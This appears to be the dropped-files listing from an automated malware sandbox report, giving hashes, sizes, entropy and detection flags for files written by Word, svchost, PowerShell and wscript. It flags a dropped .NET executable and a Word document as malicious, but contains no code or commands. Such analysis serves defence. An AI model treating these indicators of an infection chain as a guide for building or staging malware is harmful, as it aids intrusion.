                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1310720
                                                                                                                                                Entropy (8bit):0.7067089662958794
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:2JPJJ5JdihkWB/U7mWz0FujGRFDp3w+INKEbx9jzW9KHSjoN2jucfh11AoYQ6Vqz:2JIB/wUKUKQncEmYRTwh0P
                                                                                                                                                MD5:5A826E0E27D6A328F0EB469F2C14EAAB
                                                                                                                                                SHA1:A508A7CB5C63DE45BCB1BA7A80F80615AE7F0690
                                                                                                                                                SHA-256:3A3F48F051D30129484D35BC2CAD68C9BF59302BCAC2008460E52993E237EB01
                                                                                                                                                SHA-512:FD120034C3F7ECB85307B01A3FED5C5E354D24BECF1A523F255B4E18A1EF12A4329A034597A9A9A676DEF67922AA41FC5EFFC27D2577E1FF93E9D5151D21A61F
                                                                                                                                                Malicious:false
Preview:(binary data; readable strings: C:\ProgramData\Microsoft\Network\Downloader\, C:\ProgramData\Microsoft\Network\Downloader\qmgr.db)
                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                File Type:Extensible storage engine DataBase, version 0x620, checksum 0x36e7cdbd, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1310720
                                                                                                                                                Entropy (8bit):0.7900001668379976
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:bSB2ESB2SSjlK/JvED2y0IEWBqbMo5g5FYkr3g16k42UPkLk+kq+UJ8xUJoU+dzV:bazaPvgurTd42UgSii
                                                                                                                                                MD5:1827183A8CE7CECA31E4DA847A469D4B
                                                                                                                                                SHA1:CA35372F23EB4E2959BA5C0EA3CFFC470370BDF3
                                                                                                                                                SHA-256:C77367967F885A0F3BDF6A0594ED2624D3C9A50A9805B0F29B66528879C292AD
                                                                                                                                                SHA-512:958A1ABCF44D61AA65A907CCCBEDD49A474AC951A507BDF921FD841911D731B00AE3955E2EB3125538DD59C7A02D4B6964525D982449E5A140A27FFF34C88762
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):16384
                                                                                                                                                Entropy (8bit):0.08196467919824885
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:x4S/llKYeNtgvkgGqt/57Dek3JlnZevXAllEqW3l/TjzzQ/t:KyKzNtDgHR3t0Amd8/
                                                                                                                                                MD5:3ABF4E0937E7ADA59EA529AE0F5488A7
                                                                                                                                                SHA1:2DC122C572477A07A06F78B051DEBE8DE21EF511
                                                                                                                                                SHA-256:8409C3A405B952DBFD0C620E079C50C30121BF2EDEF66D7ACA2759DCD79D5539
                                                                                                                                                SHA-512:97B67478ACCF0376E82BAD89F98FF883039D03ACE37D2678AE307F5C1908A81B3937FBDFCAD99000A0F0067A9CD1DA906E7CD49CC6D315158B633AACB3076532
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe
                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):706
                                                                                                                                                Entropy (8bit):5.349842958726647
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12:Q3La/hz92n4M0kvoDLI4MWuCqDLI4MWuPTAq1KDLI4M9XKbbDLI4MWuPJKAVKhav:MLU84jE4K5E4KH1qE4qXKDE4KhKiKhk
                                                                                                                                                MD5:873FA73F7EAAC5A90DC38988855C5032
                                                                                                                                                SHA1:694CDB950E35FE9EDBAE22377CBB1630F8F1DB84
                                                                                                                                                SHA-256:501001FA544E6D1C28EE3BAAAB9CC953E4421AD91222FF68C44CB5BC015D6E02
                                                                                                                                                SHA-512:3DE429FD9A218A6B491E0D9346A31E9B0418331649452B0AA161452DE6D2DA535AAA3E0FE18FE73B0A7AF77DE7C43DAD77E2C72ADFAC153A1E5EB279FAEB32B0
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:JSON data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):521377
                                                                                                                                                Entropy (8bit):4.9084889265453135
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3072:gdTb5Sb3F2FqSrfZm+CnQsbzxZO7aYb6f5780K2:wb5q3umBnzT
                                                                                                                                                MD5:C37972CBD8748E2CA6DA205839B16444
                                                                                                                                                SHA1:9834B46ACF560146DD7EE9086DB6019FBAC13B4E
                                                                                                                                                SHA-256:D4CFBB0E8B9D3E36ECE921B9B51BD37EF1D3195A9CFA1C4586AEA200EB3434A7
                                                                                                                                                SHA-512:02B4D134F84122B6EE9A304D79745A003E71803C354FB01BAF986BD15E3BA57BA5EF167CC444ED67B9BA5964FF5922C50E2E92A8A09862059852ECD9CEF1A900
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:{"MajorVersion":4,"MinorVersion":40,"Expiration":14,"Fonts":[{"a":[4294966911],"f":"Abadi","fam":[],"sf":[{"c":[1,0],"dn":"Abadi","fs":32696,"ful":[{"lcp":983041,"lsc":"Latn","ltx":"Abadi"}],"gn":"Abadi","id":"23643452060","p":[2,11,6,4,2,1,4,2,2,4],"sub":[],"t":"ttf","u":[2147483651,0,0,0],"v":197263,"w":26215680},{"c":[1,0],"dn":"Abadi Extra Light","fs":22180,"ful":[{"lcp":983042,"lsc":"Latn","ltx":"Abadi Extra Light"}],"gn":"Abadi Extra Light","id":"17656736728","p":[2,11,2,4,2,1,4,2,2,4],"sub":[],"t":"ttf","u":[2147483651,0,0,0],"v":197263,"w":13108480}]},{"a":[4294966911],"f":"ADLaM Display","fam":[],"sf":[{"c":[536870913,0],"dn":"ADLaM Display Regular","fs":140072,"ful":[{"lcp":983040,"lsc":"Latn","ltx":"ADLaM Display"}],"gn":"ADLaM Display","id":"31965479471","p":[2,1,0,0,0,0,0,0,0,0],"sub":[],"t":"ttf","u":[2147491951,1107296330,0,0],"v":131072,"w":26215680}]},{"a":[4294966911],"f":"Agency FB","fam":[],"sf":[{"c":[536870913,0],"dn":"Agency FB Bold","fs":54372,"ful":[{"lcp":9830
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:TrueType Font data, 10 tables, 1st "OS/2", 7 names, Microsoft, language 0x409, \251 2018 Microsoft Corporation. All Rights Reserved.msofp_4_40RegularVersion 4.40;O365
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):773040
                                                                                                                                                Entropy (8bit):6.55939673749297
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:Zn84XULLDs51UJQSOf9VvLXHyheIQ47gEFGHtAgk3+/cLQ/zhm1kjFKy6Nyjbqq+:N8XPDs5+ivOXgo1kYvyz2
                                                                                                                                                MD5:4296A064B917926682E7EED650D4A745
                                                                                                                                                SHA1:3953A6AA9100F652A6CA533C2E05895E52343718
                                                                                                                                                SHA-256:E04E41C74D6C78213BA1588BACEE64B42C0EDECE85224C474A714F39960D8083
                                                                                                                                                SHA-512:A25388DDCE58D9F06716C0F0BDF2AEFA7F68EBCA7171077533AF4A9BE99A08E3DCD8DFE1A278B7AA5DE65DA9F32501B4B0B0ECAB51F9AF0F12A3A8A75363FF2C
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):2278
                                                                                                                                                Entropy (8bit):3.8567198029111625
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:48:uiTrlKxsxx8xl9Il8uLKNbdDsHS7Fd8YPstVF7d1rc:vQY0BBuSlstXc
                                                                                                                                                MD5:EDE6406EE4BE179B2A475A047BE81D93
                                                                                                                                                SHA1:2EBF05C8E693DEB7C3322AEDEEE15D2218BDB72D
                                                                                                                                                SHA-256:AF9C4CA20F88A0944FBDF1C0B8F2B6B85CD319C9176323D02FFC34DF95AD3231
                                                                                                                                                SHA-512:3CC98C9C303C336CCC4D5DC3EA6113655203C460D2E040D6A0FCC6A8E9B0C14F196DE1221B19DAAEFA2988CA63B04BEF977978A0A5A1E2CD818F373FBDE81BF0
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".C.J.1.m.u.g.S.o.z.s.S.9.x.S.Z./.Q.v.O.c.+.E.J.4.u.2.c.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".g.D.t.b.7.Q.Z.K.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.4.v.S.e.g.D.
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):2684
                                                                                                                                                Entropy (8bit):3.9133499873293944
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:48:uiTrlKxJxCmLxl9Il8uLKAmntN4jEjc6d97T6fYtGAU3Psnpgy1Dd/vc:3EY0AmntKd6dwQFEUnpL1e
                                                                                                                                                MD5:A0C271CF760C914F066698D90126502D
                                                                                                                                                SHA1:F893EC5FC0CB0EC7E5767F49E8B0FE7E48B1089B
                                                                                                                                                SHA-256:42E5E1811BEA161F9EC612D11A2AD1DFC515A6256CC2319DCD5621A7B018CA1F
                                                                                                                                                SHA-512:F41601929FDA288D2FDAA7D35AEECD775E60DEA47BC3BA0A5798A06BC2D51C6B98133A00A1BE14AEB59BE34084DF822ECCA1FCA648FE9AD972F81AE32296FF85
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".V.H.X.L.G.R.5.H.j.D.k.3.C.i.F.b.L.a.m.K.N.+.n.c.g.T.0.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".g.C.y.N.B.N.B.o.3.A.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.4.v.S.e.g.D.
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):4542
                                                                                                                                                Entropy (8bit):4.002544533698934
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:96:LY0c0R2EMtwjvFBUT2VHkRnum6a6mc0IC7SZ0UwT9k:LLQVtwjvFeidCulnLC7i0jT6
                                                                                                                                                MD5:97FC6D87019B7C473B69A1E96FEB61F6
                                                                                                                                                SHA1:6F97B8156C44FC7735271D6E9FFF634E57B8F9FA
                                                                                                                                                SHA-256:658DA69A83434A78986CD5251533989C0A67320CA7870091B84D1657D88997FB
                                                                                                                                                SHA-512:7625D231395EC69448D07651CEBD185C9675DEEA76E79E6E4B71484065A183A277EAD2F0B4DC82D8EEAB46DBB0DDF9FE0AD160C305089B73086D120E5881C2AD
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".V.q.Y.a.6.3.X.Y.9.b.4.Y.b.C.Z.g.f.0.u.y.E.6.v.n.x.e.w.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".E.8.Q.Z.0./.5.J.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.w.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.4.v.S.e.g.D.
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):32768
                                                                                                                                                Entropy (8bit):3.719226553592012
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:384:ctv/HQAzfTJVP760j3P9qS1cE52ftBpIz/:dAr1VP+Zw
                                                                                                                                                MD5:6E2B4083BA370A456603D6C7598C6BA7
                                                                                                                                                SHA1:7BF524413523C037B03C3AB44E8FF163DAE12F67
                                                                                                                                                SHA-256:67AFEB5EC4AB62A26BC057FE517AB72F70EA278B26BACC2CDC5C7813089956DA
                                                                                                                                                SHA-512:856FA01F9D6044532D6BFFEE06A2B13B284D793588B3656EDB09D060FA02430F8CC0875CA85E106AD2AC3D1E47178CC823C75CD1005BC091D175F0CDD072020F
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1024
                                                                                                                                                Entropy (8bit):0.05194905805374581
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:1lvlxlln:vz
                                                                                                                                                MD5:FB294ADA09B99EF2DEFEDC229C6C3EF7
                                                                                                                                                SHA1:D15075354757A59DE6E057435511D956663955FB
                                                                                                                                                SHA-256:8B2E62CCAF3758D056D38071A1C4E0F0C9402FEC9F951801E394020235F8C099
                                                                                                                                                SHA-512:AF6EFE82BEB4C57C61A5F769AE95810A277A5A791F698FE3BCF957197804D91A3170B505D5CD353870121D2F4A99131C61A41E0779DB51821845DD046490D09E
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):177664
                                                                                                                                                Entropy (8bit):7.757333394091002
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3072:/Qv8/m8hRr4ZWmhtRGKTCaWzUp0jxrZmHM26XF1g39JZY6Rd:/k83r4MmhvGKTpa1tXUJLd
                                                                                                                                                MD5:94A7E3859C2E4238421CDFE73D49603C
                                                                                                                                                SHA1:03F03C5B5D8CF362AA52B9E793E7BE398D779C21
                                                                                                                                                SHA-256:639135EB69333ABA7ECB762072D8BEF1D2DB83E54EDBE627DD223039142B8C91
                                                                                                                                                SHA-512:74048463606F7017BD8BD3C92773EDDE5A406247C5EA437B8EE580A3D9E65EB755AA44DE466FC2AABEF8B9A67C40163AFEB3DF9BC9FB35F8AFE20814D5DE85B5
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                Joe Sandbox View:
                                                                                                                                                • Filename: TRANSFERENCIA COMPROBANTES.lnk, Detection: malicious, Browse
                                                                                                                                                • Filename: Transferencia.lnk, Detection: malicious, Browse
                                                                                                                                                • Filename: dHrrqccwkL.doc, Detection: malicious, Browse
                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):64
                                                                                                                                                Entropy (8bit):1.1940658735648508
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:Nlllul/nq/llh:NllUyt
                                                                                                                                                MD5:AB80AD9A08E5B16132325DF5584B2CBE
                                                                                                                                                SHA1:F7411B7A5826EE6B139EBF40A7BEE999320EF923
                                                                                                                                                SHA-256:5FBE5D71CECADD2A3D66721019E68DD78C755AA39991A629AE81C77B531733A4
                                                                                                                                                SHA-512:9DE2FB33C0EA36E1E174850AD894659D6B842CD624C1A543B2D391C8EBC74719F47FA88D0C4493EA820611260364C979C9CDF16AF1C517132332423CA0CB7654
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Windows\System32\wscript.exe
                                                                                                                                                File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: admin, Template: Normal.dotm, Last Saved By: oplup, Revision Number: 3, Name of Creating Application: Microsoft Office Word, Total Editing Time: 01:00, Create Time/Date: Sun Dec 8 09:02:00 2024, Last Saved Time/Date: Sun Dec 8 09:04:00 2024, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):199680
                                                                                                                                                Entropy (8bit):7.547374221413506
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3072:a877VGZ5Sd3b4e0wNZtsqXNKd5AvDJW4S+I/tZ6X1bpF6mfTm:DGZYwAZHMCDJ8/u5pAmbm
                                                                                                                                                MD5:7EA9DA3DD3DB6F3FADF04AC76B54434B
                                                                                                                                                SHA1:B30B950191046D999E71AAA54FB2648C6655CE9B
                                                                                                                                                SHA-256:947BCE97211371E730A2B8B79C2EC4D154904E8FAA7BED2583C5C6C420230170
                                                                                                                                                SHA-512:F94EB382DEDB8C3952DBC0F3B9040201455CEC641C845BEDF5765A2772AA98CB20D92B3E0EDADCD92FD7CDB77E7C6F37D26BDD276CCEEA733237E28F04240F9D
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:ASCII text, with very long lines (1282), with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):20971520
                                                                                                                                                Entropy (8bit):0.014231070498289672
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:IMTicjuY7j7IVktUWAnyj91Py7lLOfQEtB:h
                                                                                                                                                MD5:A5865C462CA636F9882BF87CBB3B532D
                                                                                                                                                SHA1:792C7573D48DED68E08C7BDC8EBD85093F6D4CDD
                                                                                                                                                SHA-256:30DE38D5B6407F7B5247AEC10B9868E90491D21B94518C46F6679728F9EBBD8C
                                                                                                                                                SHA-512:D71980C9700276B8C6D00C69319F2BB806A5408EEC7D87DEA69BFA173B27F16CB750DC5AC24C811B9B01A72426F22EF1689DD74BEC857372788520CFDBCDC7AA
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:Timestamp.Process.TID.Area.Category.EventID.Level.Message.Correlation..12/09/2024 05:52:30.936.WINWORD (0x1C48).0x1C90.Microsoft Word.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Telemetry.LoadXmlRules","Flags":33777014401990913,"InternalSequenceNumber":23,"Time":"2024-12-09T05:52:30.936Z","Contract":"Office.System.Activity","Activity.CV":"JSfnoFtgIki0271ec5xR7w.7.1","Activity.Duration":171,"Activity.Count":1,"Activity.AggMode":0,"Activity.Success":false,"Activity.Result.Code":-2147024890,"Activity.Result.Type":"HRESULT","Activity.Result.Tag":528307459}...12/09/2024 05:52:30.952.WINWORD (0x1C48).0x1C90.Microsoft Word.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Telemetry.ProcessIdleQueueJob","Flags":33777014401990913,"InternalSequenceNumber":25,"Time":"2024-12-09T05:52:30.952Z","Contract":"Office.System.Activity","Activity.CV":"JSfnoFtgIki0271ec5xR7w.7","Activity.Duration":12432,"Activity.Count":1,"Activity.AggMode":0,"Activity.Success":false,"Data.Failure
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):20971520
                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3::
                                                                                                                                                MD5:8F4E33F3DC3E414FF94E5FB6905CBA8C
                                                                                                                                                SHA1:9674344C90C2F0646F0B78026E127C9B86E3AD77
                                                                                                                                                SHA-256:CD52D81E25F372E6FA4DB2C0DFCEB59862C1969CAB17096DA352B34950C973CC
                                                                                                                                                SHA-512:7FB91E868F3923BBD043725818EF3A5D8D08EBF1059A18AC0FE07040D32EEBA517DA11515E6A4AFAEB29BCC5E0F1543BA2C595B0FE8E6167DDC5E6793EDEF5BB
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):4026
                                                                                                                                                Entropy (8bit):7.809492693601857
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:96:VpDCBFLhxaUGm5EWA07yNdKH1FQpy8tnX8Iz3b7TrT502+fPD:VpDYFFRMNU+RtXzLf35t+3D
                                                                                                                                                MD5:5D9BAD7ADB88CEE98C5203883261ACA1
                                                                                                                                                SHA1:FBF1647FCF19BCEA6C3CF4365C797338CA282CD2
                                                                                                                                                SHA-256:8CE600404BB3DB92A51B471D4AB8B166B566C6977C9BB63370718736376E0E2F
                                                                                                                                                SHA-512:7132923869A3DA2F2A75393959382599D7C4C05CA86B4B27271AB9EA95C7F2E80A16B45057F4FB729C9593F506208DC70AF2A635B90E4D8854AC06C787F6513D
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):250
                                                                                                                                                Entropy (8bit):3.4916022431157345
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:fxnxUXsAl8xoE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxny8A8xoGHmD0+dAH/luWvv
                                                                                                                                                MD5:1A314B08BB9194A41E3794EF54017811
                                                                                                                                                SHA1:D1E70DB69CA737101524C75E634BB72F969464FF
                                                                                                                                                SHA-256:9025DD691FCAD181D5FD5952C7AA3728CD8A2CAF20DEA14930876419BED9B379
                                                                                                                                                SHA-512:AB29C8674A85711EABAE5F9559E9048FE91A2F51EB12D5A46152A310DE59F759DF8C617DA248798A7C20F60E26FBB1B0FC8DB47C46B098BCD26CF8CE78989ACA
                                                                                                                                                Malicious:false
                                                                                                                                                 Preview:[File]; OriginalName: BracketList.glox; Component: WordFiles; ReqVer: 14; StoreLocation: {My Templates}\SmartArt Graphics
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):254
                                                                                                                                                Entropy (8bit):3.4845992218379616
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:fxnxUXQFoElh/lE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxny8lLGHmD0+dAH/luWvv
                                                                                                                                                MD5:E8B30D1070779CC14FBE93C8F5CF65BE
                                                                                                                                                SHA1:9C87F7BC66CF55634AB3F070064AAF8CC977CD05
                                                                                                                                                SHA-256:2E90434BE1F6DCEA9257D42C331CD9A8D06B848859FD4742A15612B2CA6EFACB
                                                                                                                                                SHA-512:C0D5363B43D45751192EF06C4EC3C896A161BB11DBFF1FC2E598D28C644824413C78AE3A68027F7E622AF0D709BE0FA893A3A3B4909084DF1ED9A8C1B8267FCA
                                                                                                                                                Malicious:false
                                                                                                                                                 Preview:[File]; OriginalName: HexagonRadial.glox; Component: WordFiles; ReqVer: 14; StoreLocation: {My Templates}\SmartArt Graphics
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):6024
                                                                                                                                                Entropy (8bit):7.886254023824049
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:96:bGa2onnLYHTSSxpHVTSH1bywZKmpRqiUtFvS9xrPooBpni6eDa16MUELHsrKjRBA:SJonLYzSSr1TuZNwtFZKpiiyrKXuCUd
                                                                                                                                                MD5:20621E61A4C5B0FFEEC98FFB2B3BCD31
                                                                                                                                                SHA1:4970C22A410DCB26D1BD83B60846EF6BEE1EF7C4
                                                                                                                                                SHA-256:223EA2602C3E95840232CACC30F63AA5B050FA360543C904F04575253034E6D7
                                                                                                                                                SHA-512:BDF3A8E3D6EE87D8ADE0767918603B8D238CAE8A2DD0C0F0BF007E89E057C7D1604EB3CCAF0E1BA54419C045FC6380ECBDD070F1BB235C44865F1863A8FA7EEA
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
